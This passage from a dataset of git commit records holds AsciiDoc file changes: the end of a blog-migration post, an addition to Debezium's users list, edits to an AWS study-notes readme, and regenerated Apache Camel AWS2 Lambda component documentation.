It's possible to use Asciidoc or Markdown and Disqus.\nInstead of Hugo, it's written in Ruby.\n\n=== JBake\n\nFor the ones considering JBake, I moved from https:\/\/www.montreal-jug.org[JBake] a long time ago as you can read in my link:..\/..\/..\/2017\/10\/29\/From-J-Bke-to-Hubpress.html[post] on that.\n\n=== Decision\n\nI decided to go with Jekyll as I am already familiar with it and I don't care about performance.\nThe ones who do should consider Hugo.\n\n== Theme\n\nI did some research on the web to start with a pre-existing theme and I went with https:\/\/startbootstrap.com\/themes\/clean-blog-jekyll\/[Clean Blog]\n\n== Commenting\n\nAs I said, I already use Disqus so I didn't want to change.\nI would like a solution where the content doesn't belong to me but at the moment I didn't find any that meets my needs of owning my content.\nI am considering to move away from Disqus at some point for https:\/\/utteranc.es[utterances] that is based on Github Issues but I will be still not owning my content.\n\n== Blog migration\n\nI was already using asciidoc so I copied all my asciidoc files directly to the post folder in Jekyll.\nEverything went smoothly and all the posts where generated to HTML with all the informations needed.\n\nI add to adapt the images path with the new one in some asciidoc files contening pictures but a quick CMD+R helped me to change all the files in a nutshell.\n\nSo I avoided having to develop a batch to process all my asciidoc to migrate but with a lot more content it would have been the solution I would have used.\n\n== Automate the deployment\n\nI had never tried \"Github Actions\" before so I decided to give it a try and it was as easy as following this https:\/\/jekyllrb.com\/docs\/continuous-integration\/github-actions\/[procedure].\n\nI took a few minutes to generate \"et voil\u00e0 !\"\n\nAnd now, because you are reading those lines I guess everything worked fine.\n\n== Conclusion\n\nI miss Hubpress which has a web interface to edit the asciidoc but it's completely replaced by the automating of the deployement to the Github Pages.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"03f5f6e7c8a379ff767636ed27d7889dd15c0d29","subject":"Lendingkart Debizium ","message":"Lendingkart Debizium \n\nLendingkart is one of user of Debizium","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"community\/users.asciidoc","new_file":"community\/users.asciidoc","new_contents":"= Who's Using Debezium?\n:awestruct-layout: doc\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\nDebezium is used in production by a wide range of companies and organizations.\nThis list contains users of Debezium who agreed to serve as public reference;\nwhere available, further resources with more details are linked.\n\nIf your organization would like to be added to (or removed from) this list,\nplease send a pull request for updating the https:\/\/github.com\/debezium\/debezium.github.io\/blob\/develop\/community\/users.asciidoc[source of this page].\n\n* Behalf (https:\/\/aws.amazon.com\/blogs\/apn\/how-behalf-met-its-streaming-data-scaling-demands-with-amazon-managed-streaming-for-apache-kafka\/[details])\n* Convoy (https:\/\/medium.com\/convoy-tech\/logs-offsets-near-real-time-elt-with-apache-kafka-snowflake-473da1e4d776[details])\n* Experience\n* JW Player (https:\/\/www.slideshare.net\/jwplayer\/polylog-a-logbased-architecture-for-distributed-systems-124997666[details])\n* Kenshoo\n* Lendingkart 
Tech\n* OYO\n* Pipedrive\n* Segment (used with https:\/\/ctlstore.segment.com\/[ctlstore])\n* Synaltic (https:\/\/www.synaltic.fr\/blog\/conference-poss-11-12-2019[details in french])\n* Traveloka\n* Usabilla by Surveymonkey\n* WePay, Inc. (https:\/\/wecode.wepay.com\/posts\/streaming-databases-in-realtime-with-mysql-debezium-kafka[details], https:\/\/wecode.wepay.com\/posts\/streaming-cassandra-at-wepay-part-1[more details])\n* ... and you? Then let us know and get added to the list, too. Thanks!\n","old_contents":"= Who's Using Debezium?\n:awestruct-layout: doc\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\nDebezium is used in production by a wide range of companies and organizations.\nThis list contains users of Debezium who agreed to serve as public reference;\nwhere available, further resources with more details are linked.\n\nIf your organization would like to be added to (or removed from) this list,\nplease send a pull request for updating the https:\/\/github.com\/debezium\/debezium.github.io\/blob\/develop\/community\/users.asciidoc[source of this page].\n\n* Behalf (https:\/\/aws.amazon.com\/blogs\/apn\/how-behalf-met-its-streaming-data-scaling-demands-with-amazon-managed-streaming-for-apache-kafka\/[details])\n* Convoy (https:\/\/medium.com\/convoy-tech\/logs-offsets-near-real-time-elt-with-apache-kafka-snowflake-473da1e4d776[details])\n* Experience\n* JW Player (https:\/\/www.slideshare.net\/jwplayer\/polylog-a-logbased-architecture-for-distributed-systems-124997666[details])\n* Kenshoo\n* OYO\n* Pipedrive\n* Segment (used with https:\/\/ctlstore.segment.com\/[ctlstore])\n* Synaltic (https:\/\/www.synaltic.fr\/blog\/conference-poss-11-12-2019[details in french])\n* Traveloka\n* Usabilla by Surveymonkey\n* WePay, Inc. (https:\/\/wecode.wepay.com\/posts\/streaming-databases-in-realtime-with-mysql-debezium-kafka[details], https:\/\/wecode.wepay.com\/posts\/streaming-cassandra-at-wepay-part-1[more details])\n* ... and you? Then let us know and get added to the list, too. Thanks!\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e2fb3e7828f3bc8fceef71fc5af42e70d4d76104","subject":"201802030747","message":"201802030747\n","repos":"bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house","old_file":"fiddles\/aws\/readme.adoc","new_file":"fiddles\/aws\/readme.adoc","new_contents":"= Amazon Web Services\n\nI finally finished my bachelor's degree in 2015. At 40 I graduated Cum Laude from the Illinois Institute of\nTechnology's Information and Technology Management program. The achievement took nearly eight years of\nmy life, cost nearly 80K. In hind sight, I wish I would have just spent that time (and money) studying and\nmastering AWS. Anyway, life goes on and here we are--time to make-up for lost time. This directory is\ndedicated to my notes and `fiddles` involving AWS. At the outset, this just means markdown files written\nwhile watching lectures on link:http:\/\/acloud.guru[acloud.guru].\n\n\n== Lecture Notes\n\n=== Intro\n1. link:overview.md[10,000 Foot Overview]\n2. link:dont-freakout.md[Don't Freakout]\n\n=== IAM\n1. link:iam.md[IAM 101]\n2. link:billing-alarm.md[Creating a Billing Alarm]\n\n=== S3\n1. link:s3.md[S3 101]\n","old_contents":"= Amazon Web Services\n\nI finally finished my bachelor's degree in 2015. 
At 40 I graduated Cum Laude from the Illinois Institute of\nTechnology's Information and Technology Management program. The achievement took nearly eight years of\nmy life, cost nearly 80K. In hind sight, I wish I would have just spent that time (and money) studying and\nmastering AWS. Anyway, life goes on and here we are--time to make-up for lost time. This directory is\ndedicated to my notes and `fiddles` involving AWS. At the outset, this just means markdown files written\nwhile watching lectures on link:http:\/\/acloud.guru[acloud.guru].\n\n\n== Lecture Notes\n\n=== Intro\n#### link:overview.md[10,000 Foot Overview]\n#### link:dont-freakout.md[Don't Freakout]\n\n=== IAM\n#### link:iam.md[IAM 101]\n#### link:billing-alarm.md[Creating a Billing Alarm]\n\n=== S3\n#### link:s3.md[S3 101]\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"c726822f3f2cd15d9e0b80adac92ef45105aacce","subject":"201803030925","message":"201803030925\n","repos":"bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house,bradyhouse\/house","old_file":"fiddles\/aws\/readme.adoc","new_file":"fiddles\/aws\/readme.adoc","new_contents":"= Amazon Web Services\n\nI finally finished my bachelor's degree in 2015. At 40 I graduated Cum Laude from the Illinois Institute of\nTechnology's Information and Technology Management program. The achievement took nearly eight years of\nmy life and cost over 80K. In hindsight, I wish I would have just spent that time (and money) studying and\nmastering AWS. Anyway, life goes on and here we are--making-up for lost time. This directory is\ndedicated to my notes and `fiddles` involving AWS. At the outset, this just means markdown files written\nwhile watching lectures\/labs on link:http:\/\/acloud.guru[acloud.guru]. 
Note, aside from purchasing the\n`AWS Certified Solutions Architect - Associate` course on cloud guru, all of my studies have been\ndone using an link:https:\/\/aws.amazon.com\/free\/[AWS free tier account].\n\n\n== Lecture \/ Lab Notes\n\n[cols=\">s,m\", width=\"100%\"]\n|=========================================================\n2+>| **Intro**\n||link:overview.md[10,000 Foot Overview]\n||link:dont-freakout.md[Don't Freakout]\n2+>| **IAM**\n||link:iam\/iam.md[IAM 101]\n||link:iam\/billing-alarm.md[Creating a Billing Alarm]\n2+>| **S3**\n||link:s3\/s3.md[S3 101]\n||link:s3\/s3-versioning.md[S3 Versioning]\n||link:s3\/s3-lifecycle.md[Life Cycle Management]\n||link:s3\/s3-encryption.md[Encryption]\n||link:s3\/s3-static-website.md[Static Website Hosting]\n||link:s3\/s3-exam-tips.md[Exam Tips]\n||link:https:\/\/aws.amazon.com\/s3\/faqs\/[S3 FAQ]\n2+>| **CloudFront**\n||link:cloudfront\/cloudfront-intro.md[CloudFront 101]\n||link:cloudfront\/cloudfront-create-a-cdn.md[Create a Distribution]\n||link:cloudfront\/cloudfront-exam-tips.md[Exam Tips]\n2+>| **Storage Gateway**\n||link:storage-gateway\/storage-gateway.md[Storage Gateway 101]\n||link:storage-gateway\/storage-gateway-exam-tips.md[Exam Tips]\n2+>| **Snowball**\n||link:snowball\/snowball.md[Snowball 101]\n||link:snowball\/snowball-exam-tips.md[Exam Tips]\n2+>| **EC2**\n||link:ec2\/ec2-101-pt1.md[EC2 101 - Part 1]\n||link:ec2\/ec2-101-pt2.md[EC2 101 - Part 2]\n||link:ec2\/ec2-instance-lab.md[EC2 Instance Lab]\n||link:ec2\/ec2-security-groups-lab.md[EC2 Security Groups Lab]\n||link:ec2\/ec2-ebs-volumes-lab.md[EC2 EBS Volumes Lab]\n||link:ec2\/ec2-encrypted-root-lab.md[EC2 Encrypted Root Volume Lab]\n||link:ec2\/ec2-ami-types.md[EC2 AMI Types: EBS vs Instance Store]\n||link:ec2\/ec2-elastic-load-balancer-lab.md[EC2 Elastic Load Balancer Lab]\n||link:ec2\/ec2-cloudwatch-lab.md[EC2 Cloudwatch Lab]\n||link:ec2\/ec2-commandline-lab.md[AWS Commandline Lab]\n||link:ec2\/ec2-iam-roles-lab.md[EC2 IAM Roles Lab]\n||link:ec2\/ec2-s3-regions-lab.md[EC2 S3 CLI and Regions Lab]\n||link:ec2\/ec2-bash-scripting-lab.md[EC2 Bash Scripting Lab]\n||link:ec2\/ec2-instance-metadata.md[EC2 Instance Metadata]\n||link:ec2\/ec2-auto-scaling-groups-lab.md[EC2 Auto Scaling Groups Lab]\n||link:ec2\/ec2-placement-groups.md[EC2 Placement Groups]\n||link:ec2\/ec2-efs-lab.md[EC2 EFS Lab]\n||link:https:\/\/aws.amazon.com\/ec2\/faqs\/[EC2 FAQ]\n||link:https:\/\/aws.amazon.com\/elasticloadbalancing\/faqs\/[ELB FAQ for Classic Load Balancer]\n|=========================================================\n\n","old_contents":"= Amazon Web Services\n\nI finally finished my bachelor's degree in 2015. At 40 I graduated Cum Laude from the Illinois Institute of\nTechnology's Information and Technology Management program. The achievement took nearly eight years of\nmy life and cost over 80K. In hindsight, I wish I would have just spent that time (and money) studying and\nmastering AWS. Anyway, life goes on and here we are--making-up for lost time. This directory is\ndedicated to my notes and `fiddles` involving AWS. At the outset, this just means markdown files written\nwhile watching lectures\/labs on link:http:\/\/acloud.guru[acloud.guru]. 
All of my studies have been\ndone using an link:https:\/\/aws.amazon.com\/free\/[AWS free tier account].\n\n\n== Lecture \/ Lab Notes\n\n[cols=\">s,m\", width=\"100%\"]\n|=========================================================\n2+>| **Intro**\n||link:overview.md[10,000 Foot Overview]\n||link:dont-freakout.md[Don't Freakout]\n2+>| **IAM**\n||link:iam\/iam.md[IAM 101]\n||link:iam\/billing-alarm.md[Creating a Billing Alarm]\n2+>| **S3**\n||link:s3\/s3.md[S3 101]\n||link:s3\/s3-versioning.md[S3 Versioning]\n||link:s3\/s3-lifecycle.md[Life Cycle Management]\n||link:s3\/s3-encryption.md[Encryption]\n||link:s3\/s3-static-website.md[Static Website Hosting]\n||link:s3\/s3-exam-tips.md[Exam Tips]\n||link:https:\/\/aws.amazon.com\/s3\/faqs\/[S3 FAQ]\n2+>| **CloudFront**\n||link:cloudfront\/cloudfront-intro.md[CloudFront 101]\n||link:cloudfront\/cloudfront-create-a-cdn.md[Create a Distribution]\n||link:cloudfront\/cloudfront-exam-tips.md[Exam Tips]\n2+>| **Storage Gateway**\n||link:storage-gateway\/storage-gateway.md[Storage Gateway 101]\n||link:storage-gateway\/storage-gateway-exam-tips.md[Exam Tips]\n2+>| **Snowball**\n||link:snowball\/snowball.md[Snowball 101]\n||link:snowball\/snowball-exam-tips.md[Exam Tips]\n2+>| **EC2**\n||link:ec2\/ec2-101-pt1.md[EC2 101 - Part 1]\n||link:ec2\/ec2-101-pt2.md[EC2 101 - Part 2]\n||link:ec2\/ec2-instance-lab.md[EC2 Instance Lab]\n||link:ec2\/ec2-security-groups-lab.md[EC2 Security Groups Lab]\n||link:ec2\/ec2-ebs-volumes-lab.md[EC2 EBS Volumes Lab]\n||link:ec2\/ec2-encrypted-root-lab.md[EC2 Encrypted Root Volume Lab]\n||link:ec2\/ec2-ami-types.md[EC2 AMI Types: EBS vs Instance Store]\n||link:ec2\/ec2-elastic-load-balancer-lab.md[EC2 Elastic Load Balancer Lab]\n||link:ec2\/ec2-cloudwatch-lab.md[EC2 Cloudwatch Lab]\n||link:ec2\/ec2-commandline-lab.md[AWS Commandline Lab]\n||link:ec2\/ec2-iam-roles-lab.md[EC2 IAM Roles Lab]\n||link:ec2\/ec2-s3-regions-lab.md[EC2 S3 CLI and Regions Lab]\n||link:ec2\/ec2-bash-scripting-lab.md[EC2 Bash Scripting Lab]\n||link:ec2\/ec2-instance-metadata.md[EC2 Instance Metadata]\n||link:ec2\/ec2-auto-scaling-groups-lab.md[EC2 Auto Scaling Groups Lab]\n||link:ec2\/ec2-placement-groups.md[EC2 Placement Groups]\n||link:ec2\/ec2-efs-lab.md[EC2 EFS Lab]\n||link:https:\/\/aws.amazon.com\/ec2\/faqs\/[EC2 FAQ]\n||link:https:\/\/aws.amazon.com\/elasticloadbalancing\/faqs\/[ELB FAQ for Classic Load Balancer]\n|=========================================================\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"c479ba0f75be5d9f9d44cdbe0277690c21480f32","subject":"CAMEL-14556 - Create an AWS-Lambda component based on SDK v2, regen docs","message":"CAMEL-14556 - Create an AWS-Lambda component based on SDK v2, regen 
docs\n","repos":"zregvart\/camel,tadayosi\/camel,tadayosi\/camel,christophd\/camel,pmoerenhout\/camel,DariusX\/camel,ullgren\/camel,adessaigne\/camel,nikhilvibhav\/camel,ullgren\/camel,alvinkwekel\/camel,cunningt\/camel,christophd\/camel,mcollovati\/camel,apache\/camel,zregvart\/camel,gnodet\/camel,alvinkwekel\/camel,pax95\/camel,pax95\/camel,pax95\/camel,christophd\/camel,cunningt\/camel,tadayosi\/camel,tdiesler\/camel,tdiesler\/camel,mcollovati\/camel,tdiesler\/camel,pax95\/camel,nicolaferraro\/camel,cunningt\/camel,nikhilvibhav\/camel,apache\/camel,gnodet\/camel,mcollovati\/camel,pmoerenhout\/camel,pmoerenhout\/camel,tadayosi\/camel,DariusX\/camel,apache\/camel,cunningt\/camel,tadayosi\/camel,apache\/camel,christophd\/camel,pmoerenhout\/camel,DariusX\/camel,cunningt\/camel,tdiesler\/camel,pax95\/camel,gnodet\/camel,adessaigne\/camel,zregvart\/camel,apache\/camel,adessaigne\/camel,adessaigne\/camel,nicolaferraro\/camel,adessaigne\/camel,mcollovati\/camel,nicolaferraro\/camel,ullgren\/camel,pmoerenhout\/camel,nicolaferraro\/camel,ullgren\/camel,alvinkwekel\/camel,tdiesler\/camel,gnodet\/camel,nikhilvibhav\/camel,pax95\/camel,cunningt\/camel,alvinkwekel\/camel,pmoerenhout\/camel,tadayosi\/camel,zregvart\/camel,apache\/camel,adessaigne\/camel,christophd\/camel,nikhilvibhav\/camel,tdiesler\/camel,christophd\/camel,DariusX\/camel,gnodet\/camel","old_file":"components\/camel-aws2-lambda\/src\/main\/docs\/aws2-lambda-component.adoc","new_file":"components\/camel-aws2-lambda\/src\/main\/docs\/aws2-lambda-component.adoc","new_contents":"= AWS Lambda Component\n\n*Since Camel 2.20*\n*Since Camel 3.2*\n\n\n\/\/ HEADER START\n*Only producer is supported*\n\/\/ HEADER END\n\nThe Lambda component supports create, get, list, delete and invoke\nhttps:\/\/aws.amazon.com\/lambda\/[AWS Lambda] functions.\n\n*Prerequisites*\n\nYou must have a valid Amazon Web Services developer account, and be\nsigned up to use Amazon Lambda. More information is available at\nhttps:\/\/aws.amazon.com\/lambda\/[AWS Lambda].\n\nWhen creating a Lambda function, you need to specify a IAM role which has at least the AWSLambdaBasicExecuteRole policy attached.\n\n*Warning*\n\nLambda is regional service. Unlike S3 bucket, Lambda function created in a given region is not available on other regions.\n\n== URI Format\n\n[source,java]\n-------------------------\naws2-lambda:\/\/functionName[?options]\n-------------------------\n\nYou can append query options to the URI in the following format,\n?options=value&option2=value&...\n\n== URI Options\n\n\n\/\/ component options: START\nThe AWS Lambda component supports 6 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *accessKey* (producer) | Amazon AWS Access Key | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. 
| false | boolean\n| *region* (producer) | Amazon AWS Region | | String\n| *secretKey* (producer) | Amazon AWS Secret Key | | String\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *configuration* (advanced) | The AWS Lambda default configuration | | Lambda2Configuration\n|===\n\/\/ component options: END\n\n\n\n\n\/\/ endpoint options: START\nThe AWS Lambda endpoint is configured using URI syntax:\n\n----\naws2-lambda:function\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *function* | *Required* Name of the Lambda function. | | String\n|===\n\n\n=== Query Parameters (11 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | The operation to perform. It can be listFunctions, getFunction, createFunction, deleteFunction or invokeFunction. The value can be one of: listFunctions, getFunction, createAlias, deleteAlias, getAlias, listAliases, createFunction, deleteFunction, invokeFunction, updateFunction, createEventSourceMapping, deleteEventSourceMapping, listEventSourceMapping, listTags, tagResource, untagResource, publishVersion, listVersions | invokeFunction | Lambda2Operations\n| *region* (producer) | Amazon AWS Region. When using this parameter, the configuration will expect the capitalized name of the region (for example AP_EAST_1) You'll need to use the name Regions.EU_WEST_1.name() | | String\n| *awsLambdaClient* (advanced) | To use a existing configured AwsLambdaClient as client | | LambdaClient\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *proxyHost* (proxy) | To define a proxy host when instantiating the Lambda client | | String\n| *proxyPort* (proxy) | To define a proxy port when instantiating the Lambda client | | Integer\n| *proxyProtocol* (proxy) | To define a proxy protocol when instantiating the Lambda client. 
The value can be one of: HTTP, HTTPS | HTTPS | Protocol\n| *accessKey* (security) | Amazon AWS Access Key | | String\n| *secretKey* (security) | Amazon AWS Secret Key | | String\n|===\n\/\/ endpoint options: END\n\n\n\n\nRequired Lambda component options\n\nYou have to provide the awsLambdaClient in the\nRegistry or your accessKey and secretKey to access\nthe https:\/\/aws.amazon.com\/lambda\/[Amazon Lambda] service.\n\n== Usage\n\n=== Message headers evaluated by the Lambda producer\n\n[width=\"100%\",cols=\"5%,5%,10%,75%,5%\",options=\"header\",]\n|=======================================================================\n|Operation |Header |Type |Description |Required\n\n|All |`CamelAwsLambdaOperation` |`String` |The operation we want to perform. Override operation passed as query parameter| Yes\n\n|createFunction |`CamelAwsLambdaS3Bucket` |`String` |Amazon S3 bucket name where the .zip file containing\nyour deployment package is stored. This bucket must reside in the same AWS region where you are creating the Lambda function.| No\n\n|createFunction |`CamelAwsLambdaS3Key` |`String` |The Amazon S3 object (the deployment package) key name\nyou want to upload.| No\n\n|createFunction |`CamelAwsLambdaS3ObjectVersion` |String |The Amazon S3 object (the deployment package) version\nyou want to upload.| No\n\n|createFunction |`CamelAwsLambdaZipFile` |`String` |The local path of the zip file (the deployment package).\n Content of zip file can also be put in Message body.| No\n\n|createFunction |`CamelAwsLambdaRole` |`String` |The Amazon Resource Name (ARN) of the IAM role that Lambda assumes\n when it executes your function to access any other Amazon Web Services (AWS) resources. |Yes\n\n|createFunction |`CamelAwsLambdaRuntime` |String |The runtime environment for the Lambda function you are uploading.\n (nodejs, nodejs4.3, nodejs6.10, java8, python2.7, python3.6, dotnetcore1.0, odejs4.3-edge) |Yes\n\n|createFunction |`CamelAwsLambdaHandler` |`String` |The function within your code that Lambda calls to begin execution.\n For Node.js, it is the module-name.export value in your function.\n For Java, it can be package.class-name::handler or package.class-name.|Yes\n\n|createFunction |`CamelAwsLambdaDescription` |`String` |The user-provided description.|No\n\n|createFunction |`CamelAwsLambdaTargetArn` |`String` |The parent object that contains the target ARN (Amazon Resource Name)\nof an Amazon SQS queue or Amazon SNS topic.|No\n\n|createFunction |`CamelAwsLambdaMemorySize` |`Integer` |The memory size, in MB, you configured for the function.\nMust be a multiple of 64 MB.|No\n\n|createFunction |`CamelAwsLambdaKMSKeyArn` |`String` |The Amazon Resource Name (ARN) of the KMS key used to encrypt your function's environment variables.\nIf not provided, AWS Lambda will use a default service key.|No\n\n|createFunction |`CamelAwsLambdaPublish` |`Boolean` |This boolean parameter can be used to request AWS Lambda\nto create the Lambda function and publish a version as an atomic operation.|No\n\n|createFunction |`CamelAwsLambdaTimeout` |`Integer` |The function execution time at which Lambda should terminate the function.\nThe default is 3 seconds.|No\n\n|createFunction |`CamelAwsLambdaTracingConfig` |`String` |Your function's tracing settings (Active or PassThrough).|No\n\n|createFunction |`CamelAwsLambdaEnvironmentVariables` |`Map<String, String>` |The key-value pairs that represent your environment's configuration settings.|No\n\n|createFunction |`CamelAwsLambdaEnvironmentTags` |`Map<String, String>` |The list 
of tags (key-value pairs) assigned to the new function.|No\n\n|createFunction |`CamelAwsLambdaSecurityGroupIds` |`List<String>` |If your Lambda function accesses resources in a VPC, a list of one or more security groups IDs in your VPC.|No\n\n|createFunction |`CamelAwsLambdaSubnetIds` |`List<String>` |If your Lambda function accesses resources in a VPC, a list of one or more subnet IDs in your VPC.|No\n\n|createAlias |`CamelAwsLambdaFunctionVersion` |`String` |The function version to set in the alias|Yes\n\n|createAlias |`CamelAwsLambdaAliasFunctionName` |`String` |The function name to set in the alias|Yes\n\n|createAlias |`CamelAwsLambdaAliasFunctionDescription` |`String` |The function description to set in the alias|No\n\n|deleteAlias |`CamelAwsLambdaAliasFunctionName` |`String` |The function name of the alias|Yes\n\n|getAlias |`CamelAwsLambdaAliasFunctionName` |`String` |The function name of the alias|Yes\n\n|listAliases |`CamelAwsLambdaFunctionVersion` |`String` |The function version to set in the alias|Yes\n\n|=======================================================================\n\n== List of Avalaible Operations\n\n- listFunctions\n- getFunction\n- createFunction\n- deleteFunction\n- invokeFunction\n- updateFunction\n- createEventSourceMapping\n- deleteEventSourceMapping\n- listEventSourceMapping\n- listTags\n- tagResource\n- untagResource\n- publishVersion\n- listVersions\n- createAlias\n- deleteAlias\n- getAlias\n- listAliases\n\n== Example\n\nTo have a full understanding of how the component works, you may have a look at this https:\/\/github.com\/apache\/camel\/blob\/master\/components\/camel-aws\/src\/test\/java\/org\/apache\/camel\/component\/aws\/lambda\/integration\/LambdaComponentIntegrationTest.java[integration test]\n\n== Automatic detection of LambdaClient client in registry\n\nThe component is capable of detecting the presence of an LambdaClient bean into the registry.\nIf it's the only instance of that type it will be used as client and you won't have to define it as uri parameter.\nThis may be really useful for smarter configuration of the endpoint.\n\n\n== Dependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-aws2-lambda<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version\\}` must be replaced by the actual version of Camel.\n\n\ninclude::camel-spring-boot::page$aws-lambda-starter.adoc[]\n","old_contents":"[[aws2-lambda-component]]\n= AWS2 Lambda Component\n\n*Since Camel 2.20*\n\n\/\/ HEADER START\n*Only producer is supported*\n\/\/ HEADER END\n\nThe Lambda component supports create, get, list, delete and invoke\nhttps:\/\/aws.amazon.com\/lambda\/[AWS Lambda] functions.\n\n*Prerequisites*\n\nYou must have a valid Amazon Web Services developer account, and be\nsigned up to use Amazon Lambda. More information is available at\nhttps:\/\/aws.amazon.com\/lambda\/[AWS Lambda].\n\nWhen creating a Lambda function, you need to specify a IAM role which has at least the AWSLambdaBasicExecuteRole policy attached.\n\n*Warning*\n\nLambda is regional service. 
Unlike S3 bucket, Lambda function created in a given region is not available on other regions.\n\n== URI Format\n\n[source,java]\n-------------------------\naws2-lambda:\/\/functionName[?options]\n-------------------------\n\nYou can append query options to the URI in the following format,\n?options=value&option2=value&...\n\n== URI Options\n\n\n\/\/ component options: START\nThe AWS Lambda component supports 6 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *accessKey* (producer) | Amazon AWS Access Key | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *region* (producer) | Amazon AWS Region | | String\n| *secretKey* (producer) | Amazon AWS Secret Key | | String\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *configuration* (advanced) | The AWS Lambda default configuration | | LambdaConfiguration\n|===\n\/\/ component options: END\n\n\n\n\n\/\/ endpoint options: START\nThe AWS Lambda endpoint is configured using URI syntax:\n\n----\naws-lambda:function\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *function* | *Required* Name of the Lambda function. | | String\n|===\n\n\n=== Query Parameters (11 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | The operation to perform. It can be listFunctions, getFunction, createFunction, deleteFunction or invokeFunction. The value can be one of: listFunctions, getFunction, createAlias, deleteAlias, getAlias, listAliases, createFunction, deleteFunction, invokeFunction, updateFunction, createEventSourceMapping, deleteEventSourceMapping, listEventSourceMapping, listTags, tagResource, untagResource, publishVersion, listVersions | invokeFunction | LambdaOperations\n| *region* (producer) | Amazon AWS Region. 
When using this parameter, the configuration will expect the capitalized name of the region (for example AP_EAST_1) You'll need to use the name Regions.EU_WEST_1.name() | | String\n| *awsLambdaClient* (advanced) | To use a existing configured AwsLambdaClient as client | | AWSLambda\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *proxyHost* (proxy) | To define a proxy host when instantiating the Lambda client | | String\n| *proxyPort* (proxy) | To define a proxy port when instantiating the Lambda client | | Integer\n| *proxyProtocol* (proxy) | To define a proxy protocol when instantiating the Lambda client. The value can be one of: HTTP, HTTPS | HTTPS | Protocol\n| *accessKey* (security) | Amazon AWS Access Key | | String\n| *secretKey* (security) | Amazon AWS Secret Key | | String\n|===\n\/\/ endpoint options: END\n\n\n\n\nRequired Lambda component options\n\nYou have to provide the awsLambdaClient in the\nRegistry or your accessKey and secretKey to access\nthe https:\/\/aws.amazon.com\/lambda\/[Amazon Lambda] service.\n\n== Usage\n\n=== Message headers evaluated by the Lambda producer\n\n[width=\"100%\",cols=\"5%,5%,10%,75%,5%\",options=\"header\",]\n|=======================================================================\n|Operation |Header |Type |Description |Required\n\n|All |`CamelAwsLambdaOperation` |`String` |The operation we want to perform. Override operation passed as query parameter| Yes\n\n|createFunction |`CamelAwsLambdaS3Bucket` |`String` |Amazon S3 bucket name where the .zip file containing\nyour deployment package is stored. This bucket must reside in the same AWS region where you are creating the Lambda function.| No\n\n|createFunction |`CamelAwsLambdaS3Key` |`String` |The Amazon S3 object (the deployment package) key name\nyou want to upload.| No\n\n|createFunction |`CamelAwsLambdaS3ObjectVersion` |String |The Amazon S3 object (the deployment package) version\nyou want to upload.| 